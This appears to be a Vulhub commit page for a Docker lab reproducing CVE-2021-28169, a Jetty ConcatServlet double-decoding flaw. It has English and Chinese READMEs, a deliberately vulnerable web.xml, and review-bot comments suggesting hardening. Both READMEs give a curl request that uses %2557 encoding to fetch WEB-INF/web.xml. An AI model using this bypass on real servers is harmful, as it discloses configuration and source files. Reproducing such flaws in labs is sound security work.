first commit
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled

2025-09-06 16:08:15 +08:00
commit 63285f61aa
2624 changed files with 88491 additions and 0 deletions

BIN jetty/CVE-2021-28169/1.png  Normal file (binary file not shown; size 165 KiB)

BIN jetty/CVE-2021-28169/2.png  Normal file (binary file not shown; size 168 KiB)

View File

@@ -0,0 +1,39 @@
# Jetty Utility Servlets ConcatServlet Double Decoding Information Disclosure Vulnerability (CVE-2021-28169)
[中文版本(Chinese version)](README.zh-cn.md)
Eclipse Jetty is a Java web server and Java Servlet container.
Before version 9.4.40, 10.0.2, 11.0.2, the `ConcatServlet` and `WelcomeFilter` classes in Jetty Servlets are influenced by a double decoding bug. If developers use these two classes manually, attackers can use them to download arbitrary sensitive files in the WEB-INF directory.
Reference links.
- https://github.com/eclipse/jetty.project/security/advisories/GHSA-gwcr-j4wh-j3cq
## Vulnerable Application
Execute the following command to start a Jetty 9.4.40 server.
```
docker compose up -d
```
After the server starts, visit ``http://your-ip:8080`` to see an example page. This page uses the `ConcatServlet` to optimize the loading of static files:
```
<link rel="stylesheet" href="/static?/css/base.css&/css/app.css">
```
## Exploit
The sensitive file web.xml is not accessible through `/static?/WEB-INF/web.xml`.
![](1.png)
Double URL encoding `W` to bypass the restriction:
```
curl -v 'http://your-ip:8080/static?/%2557EB-INF/web.xml'
```
![](2.png)
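Review bot: "Reference links." ends with a period where the list that follows expects a colon ("Reference links:"), and the URL in "visit ``http://your-ip:8080``" is wrapped in double backticks while every other inline code span in this file uses single backticks; make both consistent. "Before version 9.4.40, 10.0.2, 11.0.2" should read "Before versions 9.4.40, 10.0.2 and 11.0.2". The write-up names the affected versions but never the fixed ones or a mitigation; a one-line "Fix" note pointing readers to the patched releases listed in the linked GHSA advisory (or to not mapping `ConcatServlet` / `WelcomeFilter` at all) would make the page useful to defenders as well as to people reproducing the issue.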

View File

@@ -0,0 +1,37 @@
# Jetty 通用 Servlets 组件 ConcatServlet 信息泄露漏洞CVE-2021-28169
Eclipse Jetty是一个开源的servlet容器它为基于Java的Web容器提供运行环境而Jetty Servlets是Jetty提供给开发者的一些通用组件。
在9.4.40, 10.0.2, 11.0.2版本前Jetty Servlets中的`ConcatServlet``WelcomeFilter`类存在多重解码问题如果开发者主动使用了这两个类攻击者可以利用其访问WEB-INF目录下的敏感文件造成配置文件及代码泄露。
参考链接:
- https://github.com/eclipse/jetty.project/security/advisories/GHSA-gwcr-j4wh-j3cq
## 漏洞环境
执行如下命令启动一个Jetty 9.4.40服务器:
```
docker compose up -d
```
环境启动后,访问`http://your-ip:8080`即可查看到一个example页面。该页面使用到了`ConcatServlet`来优化静态文件的加载:
```
<link rel="stylesheet" href="/static?/css/base.css&/css/app.css">
```
## 漏洞利用
正常通过`/static?/WEB-INF/web.xml`无法访问到敏感文件web.xml
![](1.png)
对字母`W`进行双URL编码即可绕过限制访问web.xml
```
curl -v 'http://your-ip:8080/static?/%2557EB-INF/web.xml'
```
![](2.png)
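Review bot: The Chinese README diverges from the English one: its title drops the "double decoding" wording the English title carries (and, as rendered here, lacks the parentheses around CVE-2021-28169), and in the line starting "在9.4.40, 10.0.2, 11.0.2版本前" the class names `ConcatServlet``WelcomeFilter` run together with no separator; write `ConcatServlet`和`WelcomeFilter` so the sentence parses. Keep the two files in sync so a reader of either gets the same description of the affected versions and of the fix.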

View File

@@ -0,0 +1,8 @@
version: '2.2'
services:
web:
image: vulhub/jetty:9.4.40
ports:
- "8080:8080"
volumes:
- ./src:/opt/jetty/webapps/ROOT
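Review bot: `- "8080:8080"` binds the intentionally vulnerable container on every host interface; for a lab image that serves `WEB-INF/web.xml` to anyone who can reach port 8080, bind to loopback (`- "127.0.0.1:8080:8080"`) unless the README explicitly tells users to expose it. The volume `./src:/opt/jetty/webapps/ROOT` is mounted read-write although nothing in this lab needs the container to write into the checked-in sources; `./src:/opt/jetty/webapps/ROOT:ro` keeps them immutable. Also, the README starts the environment with `docker compose up -d` (the v2 CLI), which treats the top-level `version: '2.2'` key as obsolete and ignores it, so the key can be dropped.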

View File

@@ -0,0 +1,16 @@
<!DOCTYPE web-app PUBLIC
"-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN"
"http://java.sun.com/dtd/web-app_2_3.dtd" >
<web-app>
<display-name>Archetype Created Web Application</display-name>
<servlet>
<servlet-name>Concat</servlet-name>
<servlet-class>org.eclipse.jetty.servlets.ConcatServlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>Concat</servlet-name>
<url-pattern>/static</url-pattern>
</servlet-mapping>
</web-app>
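Review bot: `<display-name>Archetype Created Web Application</display-name>` is a Maven archetype leftover; name the application after the lab and add an XML comment above the `<servlet>` block stating that mapping `org.eclipse.jetty.servlets.ConcatServlet` at `/static` is the deliberately vulnerable configuration, so nobody copies this descriptor into a real deployment thinking it is a template. The `WelcomeFilter` that the README names alongside `ConcatServlet` is not configured here; that is fine for the lab, but the README should say that only `ConcatServlet` is exercised.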

View File

@@ -0,0 +1,18 @@
div {
width: 600px;
margin: 5em auto;
padding: 2em;
background-color: #fdfdff;
border-radius: 0.5em;
box-shadow: 2px 3px 7px 2px rgba(0,0,0,0.02);
}
a:link, a:visited {
color: #38488f;
text-decoration: none;
}
@media (max-width: 700px) {
div {
margin: 0 auto;
width: auto;
}
}

View File

@@ -0,0 +1,7 @@
body {
background-color: #f0f0f2;
margin: 0;
padding: 0;
font-family: -apple-system, system-ui, BlinkMacSystemFont, "Segoe UI", "Open Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;
}

View File

@@ -0,0 +1,21 @@
<!doctype html>
<html>
<head>
<title>Example Domain</title>
<meta charset="utf-8" />
<meta http-equiv="Content-type" content="text/html; charset=utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1" />
<link rel="stylesheet" href="/static?/css/base.css&/css/app.css">
</head>
<body>
<div>
<h1><% out.println("Example Domain"); %></h1>
<p>This domain is for use in illustrative examples in documents. You may use this
domain in literature without prior coordination or asking for permission.</p>
<p><a href="https://www.iana.org/domains/example">More information...</a></p>
</div>
</body>
</html>
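Review bot: The scriptlet `<% out.println("Example Domain"); %>` does nothing that a literal `<h1>Example Domain</h1>` would not; if it exists to prove that JSP compilation works in the image, say so in a JSP comment (`<%-- ... --%>`), otherwise drop it so the page stays plain HTML. The stylesheet link `/static?/css/base.css&/css/app.css` is the only element on the page that exercises `ConcatServlet`; a short HTML comment next to it pointing at the README would make that relationship obvious to someone reading `src/` on its own.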